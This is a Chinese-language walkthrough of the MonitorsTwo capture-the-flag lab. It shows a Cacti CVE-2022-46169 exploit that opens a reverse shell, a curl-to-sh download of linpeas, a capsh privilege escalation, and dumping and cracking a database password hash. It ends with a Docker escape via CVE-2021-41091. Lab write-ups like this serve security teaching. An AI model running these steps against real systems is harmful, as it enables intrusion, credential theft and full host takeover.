MonitorsTwo

34

Machine:Linux

Level:easy

信息收集

nmap

 ┌──(root㉿kali)-[/home/kali/Pentest_script/git-dumper-master]
 └─# nmap -sV -sC 10.10.11.211                      
 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-25 03:48 EDT
 Nmap scan report for 10.10.11.211
 Host is up (0.15s latency).
 Not shown: 998 closed tcp ports (reset)
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
 |   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
 |_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
 80/tcp open  http    nginx 1.18.0 (Ubuntu)
 |_http-server-header: nginx/1.18.0 (Ubuntu)
 |_http-title: Login to Cacti
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 ​
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 63.80 seconds

手工验证信息

80

显示一个登录界面并且显示版本 1.2.22 | (c) 2004-2023 - The Cacti Group,此版本存在CVE-2022-46169

漏洞利用

当我们尝试正常登陆的时候发现无法登录,所以这里肯定不需要我们登录就能完成getshell,经过搜索发现RCE-EXP

反弹shell

 ┌──(root㉿kali)-[/home/kali/Desktop]
 └─# python CVE-2022-46169.py -u http://10.10.11.211 --LHOST=10.10.14.47 --LPORT=1234
 Checking...
 The target is vulnerable. Exploiting...
 Bruteforcing the host_id and local_data_ids
 Bruteforce Success!!
 ┌──(root㉿kali)-[/home/kali/Pentest_script/git-dumper-master]
 └─# nc -lnvp 1234
 listening on [any] 1234 ...
 connect to [10.10.14.47] from (UNKNOWN) [10.10.11.211] 44144
 bash: cannot set terminal process group (1): Inappropriate ioctl for device
 bash: no job control in this shell
 bash-5.1$

docker内提权

getshell后,本机开启python web服务并将linpeas.sh上传到靶机并运行

 curl http://10.10.14.47/linpeas.sh | sh
 Files with Interesting Permissions                
      
 strace Not Found                                                             
 -rwsr-xr-x 1 root root 87K Feb  7  2020 /usr/bin/gpasswd                     
 -rwsr-xr-x 1 root root 63K Feb  7  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
 -rwsr-xr-x 1 root root 52K Feb  7  2020 /usr/bin/chsh
 -rwsr-xr-x 1 root root 58K Feb  7  2020 /usr/bin/chfn  --->  SuSE_9.3/10
 -rwsr-xr-x 1 root root 44K Feb  7  2020 /usr/bin/newgrp  --->  HP-UX_10.20
 -rwsr-xr-x 1 root root 31K Oct 14  2020 /sbin/capsh
 -rwsr-xr-x 1 root root 55K Jan 20  2022 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
 -rwsr-xr-x 1 root root 35K Jan 20  2022 /bin/umount  --->  BSD/Linux(08-1996)
 -rwsr-xr-x 1 root root 1.2M Mar 27  2022 /bin/bash
 -rwsr-xr-x 1 root root 71K Jan 20  2022 /bin/su

我们发现capshbash可能具有提权的空间,gtfobins中显示了一种方法

 pwd
 /sbin
 bash-5.1$ /sbin/capsh --gid=0 --uid=0 --
 ./capsh --gid=0 --uid=0 --
 whoami
 root

至此提权完成,但显然这不是逃离docker的方法。我们需要更多地枚举。我们将枚举仙人掌数据库,因为我们有所有必要的信息:

 mysql --host=db --user=root --password=root cacti -e "show tables"

执行此命令后,我们将看到不同的表,但我们需要查看user_auth表,因为它保存了一些特殊的东西:

 mysql --host=db --user=root --password=root cacti -e "select * from user_auth"

我们发现了一个新的用户哈希值,这非常有趣:

|  4 | marcus   | $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C |     0 | Marcus Brune   |

使用john爆破密码得到funkymonkey

┌──(root㉿kali)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt pwd.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey      (?)     
1g 0:00:00:44 DONE (2023-07-25 05:41) 0.02235g/s 190.7p/s 190.7c/s 190.7C/s 474747..coucou
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
┌──(root㉿kali)-[~]
└─# john pwd.txt --show
?:funkymonkey

getshell

使用上面的账密登录靶机成功,登陆后提示有一封邮件

┌──(root㉿kali)-[~]
└─# ssh marcus@10.10.11.211

You have mail.
Last login: Tue Jul 25 08:28:45 2023 from 10.10.14.70
marcus@monitorstwo:/var/mail$ cat /var/mail/marcus 
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of

Dear all,

We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.

CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.

CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.

CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.

Best regards,

Administrator
CISO
Monitor Two
Security Team

翻译:

收件人:all@monitorstwo.htb

发件人:administrator@monitorstwo.htb

主题:安全公告 - 三个需要注意的漏洞

全体成员,

我们想向您提请注意最近发现的三个漏洞,建议您尽快进行处理。

CVE-2021-33033:此漏洞影响 Linux 内核 5.11.14 版本之前的版本,与 CIPSO 和 CALIPSO 的 DOI 定义的引用计数相关。攻击者可以利用这个 use-after-free 问题来写入任意值。请将您的内核更新至 5.11.14 版本或更高版本以解决此漏洞。

CVE-2020-25706:此跨站脚本(XSS)漏洞影响 Cacti 1.2.13 版本,原因是在 xml_path 字段的模板导入预览过程中未正确转义错误消息。这可能允许攻击者将恶意代码注入网页,潜在地导致敏感数据被盗取或会话劫持。请升级至 Cacti 1.2.14 版本或更高版本以解决此漏洞。

CVE-2021-41091:此漏洞影响 Moby,Docker 为软件容器化创建的开源项目。攻击者可以通过遍历目录内容并在数据目录上执行程序(权限不受充分限制)来利用此漏洞。此问题已在 Moby(Docker Engine)20.10.9 版本中得到修复,用户应尽快更新至该版本。请注意,运行中的容器应该停止并重新启动以修复权限问题。

我们鼓励您迅速采取必要措施来处理这些漏洞,以避免任何潜在的安全风险。如果您有任何问题或疑虑,请随时联系我们的IT部门。

此致,

管理员 CISO Monitor Two 安全团队

这里看到提示CVE-2021-41091

回到/home/marcus发现exp.sh,运行显示

marcus@monitorstwo:~$ ./exp.sh
[!] Vulnerable to CVE-2021-41091
[!] Now connect to your Docker container that is accessible and obtain root access !
[>] After gaining root access execute this command (chmod u+s /bin/bash)

Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): yes
[!] Available Overlay2 Filesystems:
/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

[!] Iterating over the available Overlay2 filesystems !
[?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
[x] Could not get root access in '/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'

[?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[!] Rooted !
[>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'

[!] Spawning Shell
bash-5.1# exit

这里告诉了我们如何提权跟着它做就可以了

权限提升

marcus@monitorstwo:~$ /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p
bash-5.1# whoami
root